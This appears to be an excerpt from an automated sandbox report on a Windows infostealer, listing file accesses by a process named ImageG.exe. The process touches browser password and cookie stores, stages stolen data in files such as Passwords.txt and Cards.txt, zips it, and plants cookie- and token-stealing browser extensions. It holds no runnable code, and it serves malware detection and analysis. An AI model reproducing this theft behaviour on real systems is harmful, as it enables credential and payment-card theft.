        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Edge [Default] - Cookies.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Passwords.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\Avdetails.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\logBighead.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\System Info.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\TaskManagerInfo.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\computer - 2025-03-15_152648.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\AutoFill.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Bookmarks.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Cards.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Edge [Default] - Cookies.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\History.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Passwords.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\Avdetails.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\System Info.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\TaskManagerInfo.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Program Files\Windows NT\TableTextService VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\.curlrc VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\ntuser.dat.LOG2 VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\NTUSER.DAT{453f72bd-0c4f-11ec-a4f9-d05099db2397}.TM.blf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\SciTE.session VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Videos VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX\CURQNKVOIX.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.mp3 VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\WKXEWIOTXI\LSBIHQFDVT.jpg VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\WKXEWIOTXI\QNCYCDFIJJ.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\autoit-v3-setup.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\OfficeSetup.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\QNCYCDFIJJ.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\SQRKHNBNYN.xlsx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Pictures\desktop.ini VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LIJDSFKJZG.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Documents\WKXEWIOTXI.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX\IPKGELNTQY.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX\CURQNKVOIX.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX\SQRKHNBNYN.pdf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\AutoFill.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\AutoFill.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Bookmarks.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Cards.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Cards.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Downloads.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\Browsers\Passwords.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\Avdetails.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\Avdetails.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\TaskManagerInfo.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\j6XwF2In1LIqU3LtXG6S\System\TaskManagerInfo.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\US_NOVA_user_89.zip VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\US_NOVA_user_89.zip VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\US_NOVA_user_89.zip VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX\ZTGJILHXQB.xlsx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\CURQNKVOIX.xlsx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN\CURQNKVOIX.xlsx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN\FENIVHOIKN.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN\VAMYDFPUND.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\eicar.com.txt VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\IPKGELNTQY.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\LSBIHQFDVT.jpg VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\MXPXCVPDVN.jpg VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\WKXEWIOTXI.pdf VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\Downloads\ZTGJILHXQB.jpg VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\FENIVHOIKN.docx VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\QNCYCDFIJJ.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extensions.zip VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extensions.zip VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo128.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo128.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo16.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies\images\logo16.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-cookies\scripts\background.js VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens\images VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Roaming\salutq8N3G.ps1 VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\56fdf7f7bd0bdd39adba17a658c03e049j0802\files.zip VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\56fdf7f7bd0bdd39adba17a658c03e049j0802 VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeQueries volume information: C:\Users\user\AppData\Local\Temp\56fdf7f7bd0bdd39adba17a658c03e049j0802 VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
